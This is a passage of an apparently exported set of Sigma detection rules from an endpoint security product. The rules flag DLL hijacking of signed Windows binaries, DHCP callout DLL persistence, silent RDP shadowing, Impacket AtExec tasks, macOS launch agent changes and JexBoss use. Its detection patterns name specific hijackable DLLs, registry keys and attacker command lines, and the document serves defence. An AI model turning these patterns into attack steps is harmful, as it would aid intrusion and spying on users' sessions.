"content": "title: DLL Hijacking via mrt.exe\nid: 9e465662-94b6-4aa5-a6b8-523e0ed2f673\ndescription: |\n Detects potential Windows DLL Hijacking via mrt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mrt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e465662-94b6-4aa5-a6b8-523e0ed2f673",
"rule_name": "DLL Hijacking via mrt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mrt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e6f6cc7-006a-47b5-8653-d1d73fa0e2d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095551Z",
"creation_date": "2026-03-23T11:45:34.095553Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095557Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mschedexe.yml",
"content": "title: DLL Hijacking via mschedexe.exe\nid: 9e6f6cc7-006a-47b5-8653-d1d73fa0e2d9\ndescription: |\n Detects potential Windows DLL Hijacking via mschedexe.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mschedexe.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\MaintenanceUI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e6f6cc7-006a-47b5-8653-d1d73fa0e2d9",
"rule_name": "DLL Hijacking via mschedexe.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mschedexe.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9e9f7788-18a6-4b60-8051-1b9eb773f848",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072016Z",
"creation_date": "2026-03-23T11:45:34.072018Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072022Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html"
],
"name": "t1112_persistence_registry_dhcp_callout.yml",
"content": "title: DHCP Server Callout DLL Persistence Added\nid: 9e9f7788-18a6-4b60-8051-1b9eb773f848\ndescription: |\n Detects modifications to DHCP server configuration registry keys related to Callout DLL installation.\n This technique allows attackers to load malicious DLLs by abusing DHCP server's Callout DLL functionality, achieving code execution in the context of the DHCP service after service restart.\n It is recommended to investigate any DHCP server Callout DLL modifications, and to verify the legitimacy and signing of installed DLLs.\nreferences:\n - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\ndate: 2020/10/02\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\Parameters\\CalloutDlls'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\Parameters\\CalloutEnabled'\n exclusion:\n Details:\n - '(Empty)'\n - 'DWORD (0x00000000)'\n condition: selection and not exclusion\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9e9f7788-18a6-4b60-8051-1b9eb773f848",
"rule_name": "DHCP Server Callout DLL Persistence Added",
"rule_description": "Detects modifications to DHCP server configuration registry keys related to Callout DLL installation.\nThis technique allows attackers to load malicious DLLs by abusing DHCP server's Callout DLL functionality, achieving code execution in the context of the DHCP service after service restart.\nIt is recommended to investigate any DHCP server Callout DLL modifications, and to verify the legitimacy and signing of installed DLLs.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9eb14058-3136-4f42-b295-b159ce63b711",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620230Z",
"creation_date": "2026-03-23T11:45:34.620232Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620236Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing",
"https://swarm.ptsecurity.com/remote-desktop-services-shadowing/",
"https://attack.mitre.org/techniques/T1563/002/"
],
"name": "t1112_rdp_shadowing_enabled.yml",
"content": "title: Silent RDP Shadowing Enabled via Registry\nid: 9eb14058-3136-4f42-b295-b159ce63b711\ndescription: |\n Detects a registry change effectively enabling the RDP Shadowing mechanism in the current machine.\n This can be used by attackers to spy or hijack an user's RDP session, as a means of acquiring credentials or moving laterally through the network.\n The registry values indicate different levels of user control over being shadowed:\n 0 - No remote control allowed;\n 1 - Full Control with user's permission;\n 2 - Full Control without user's permission;\n 3 - View Session with user's permission;\n 4 - View Session without user's permission.\n This may be a legitimate action from a tech support team.\n It is recommended to analyze the process responsible for the registry modification to determine the legitimacy of this action.\nreferences:\n - https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing\n - https://swarm.ptsecurity.com/remote-desktop-services-shadowing/\n - https://attack.mitre.org/techniques/T1563/002/\ndate: 2023/08/25\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.002\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow'\n Details|contains: '?WORD' # Non-zero values work with different effects\n\n filter_values:\n Details:\n - 'DWORD (0x00000000)' # Disabled or request user permissions\n - 'DWORD (0x00000001)'\n - 'DWORD (0x00000003)'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9eb14058-3136-4f42-b295-b159ce63b711",
"rule_name": "Silent RDP Shadowing Enabled via Registry",
"rule_description": "Detects a registry change effectively enabling the RDP Shadowing mechanism in the current machine.\nThis can be used by attackers to spy or hijack an user's RDP session, as a means of acquiring credentials or moving laterally through the network.\nThe registry values indicate different levels of user control over being shadowed:\n0 - No remote control allowed;\n1 - Full Control with user's permission;\n2 - Full Control without user's permission;\n3 - View Session with user's permission;\n4 - View Session without user's permission.\nThis may be a legitimate action from a tech support team.\nIt is recommended to analyze the process responsible for the registry modification to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-08-25",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ec35ca1-e7b1-4bbc-a829-98e3e48067dc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624462Z",
"creation_date": "2026-03-23T11:45:34.624464Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/fortra/impacket/blob/master/examples/atexec.py",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1053_005_atexec_scheduled_task_created.yml",
"content": "title: AtExec Scheduled Task Created\nid: 9ec35ca1-e7b1-4bbc-a829-98e3e48067dc\ndescription: |\n Detects scheduled tasks created by AtExec, a tool from the Impacket suite used for remote command execution via scheduled tasks.\n AtExec creates distinctive scheduled tasks with specific characteristics including a hardcoded StartBoundary timestamp (2015-07-15T20:35:13.2757294) and command-lines that redirect output to temporary files in %windir%\\Temp\\.\n This technique is commonly used by attackers for lateral movement and remote code execution on Windows systems.\n It is recommended to investigate the source of the scheduled task creation, review the task content and command line for malicious activity, and check for related lateral movement indicators on both source and target systems.\nreferences:\n - https://github.com/fortra/impacket/blob/master/examples/atexec.py\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2025/11/07\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.lateral_movement\n - attack.t1053.005\n - classification.Windows.Source.ScheduledTask\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: scheduled_task\ndetection:\n selection_operation:\n OperationType: 'create'\n\n selection_atexec:\n - FirstActionCommandLine: 'cmd.exe /C * > %windir%\\Temp\\\\????????.tmp 2>&1'\n - TaskContent|contains: '2015-07-15T20:35:13.2757294'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ec35ca1-e7b1-4bbc-a829-98e3e48067dc",
"rule_name": "AtExec Scheduled Task Created",
"rule_description": "Detects scheduled tasks created by AtExec, a tool from the Impacket suite used for remote command execution via scheduled tasks.\nAtExec creates distinctive scheduled tasks with specific characteristics including a hardcoded StartBoundary timestamp (2015-07-15T20:35:13.2757294) and command-lines that redirect output to temporary files in %windir%\\Temp\\.\nThis technique is commonly used by attackers for lateral movement and remote code execution on Windows systems.\nIt is recommended to investigate the source of the scheduled task creation, review the task content and command line for malicious activity, and check for related lateral movement indicators on both source and target systems.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2025-11-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ec5d550-39ee-4097-b20d-5f4d170024f2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092665Z",
"creation_date": "2026-03-23T11:45:34.092667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092672Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_spectrum.yml",
"content": "title: DLL Hijacking via spectrum.exe\nid: 9ec5d550-39ee-4097-b20d-5f4d170024f2\ndescription: |\n Detects potential Windows DLL Hijacking via spectrum.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'spectrum.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SpectrumSyncClient.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ec5d550-39ee-4097-b20d-5f4d170024f2",
"rule_name": "DLL Hijacking via spectrum.exe",
"rule_description": "Detects potential Windows DLL Hijacking via spectrum.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9eef92d3-30f8-41cf-aef3-2097a98e42ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617301Z",
"creation_date": "2026-03-23T11:45:34.617304Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617308Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/"
],
"name": "t1543_001_launch_agents_modified.yml",
"content": "title: Launch Agent Modified\nid: 9eef92d3-30f8-41cf-aef3-2097a98e42ee\ndescription: |\n Detects a modification of a launch agent.\n Adversaries may modify existing launch agents in order to install a backdoor.\n It is recommended to check if the process making the modification has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n - Path|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n - TargetPath|startswith:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - '/Users/*/Library/LaunchAgents/'\n selection_process:\n ProcessImage|contains: '?'\n\n filter_access:\n Kind:\n - 'read'\n - 'remove'\n - 'chmod'\n - 'chown'\n - 'create'\n\n filter_nosync:\n Path|contains: '.dat.nosync'\n\n exclusion_airwatch:\n Image: '/Library/Application Support/AirWatch/hubd'\n\n exclusion_jamf:\n Image:\n - '/usr/local/jamf/bin/jamf'\n - '/Library/Application Support/JAMF/Remote Assist/connect/jamfRemoteAssist'\n\n exclusion_cp:\n Image: '/bin/cp'\n\n exclusion_teamviewer:\n Image: '/Library/PrivilegedHelperTools/com.teamviewer.Helper'\n\n # TODO : when signature available uncomment this and remove the next exclusion\n # exclusion_app:\n # Image|startswith:\n # - '/Application'\n # - '/Users/*/Library/Application Support/'\n # ProcessSigned: 'true'\n exclusion_finder:\n ProcessImage: '/system/library/coreservices/finder.app/contents/macos/finder'\n\n exclusion_common_folders:\n - ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9eef92d3-30f8-41cf-aef3-2097a98e42ee",
"rule_name": "Launch Agent Modified",
"rule_description": "Detects a modification of a launch agent.\nAdversaries may modify existing launch agents in order to install a backdoor.\nIt is recommended to check if the process making the modification has legitimate reason to do it.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f09d436-4bef-4f87-94a3-3a0bdbc7d7bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077353Z",
"creation_date": "2026-03-23T11:45:34.077355Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077360Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/joaomatosf/jexboss",
"https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_jexboss_usage.yml",
"content": "title: Possible JexBoss Execution\nid: 9f09d436-4bef-4f87-94a3-3a0bdbc7d7bb\ndescription: |\n Detects the execution of JexBoss.\n JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/joaomatosf/jexboss\n - https://www.cisa.gov/uscert/ncas/analysis-reports/AR18-312A\n - https://attack.mitre.org/techniques/T1190/\ndate: 2022/05/23\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.JexBoss\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - 'cmd.exe /C uname -a'\n - 'cmd.exe /C cat /etc/issue'\n - 'cmd.exe /C id'\n ParentCommandLine|contains: 'jboss'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9f09d436-4bef-4f87-94a3-3a0bdbc7d7bb",
"rule_name": "Possible JexBoss Execution",
"rule_description": "Detects the execution of JexBoss.\nJexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-05-23",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9f0f3944-c7d2-4c5f-888b-bac198e03921",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
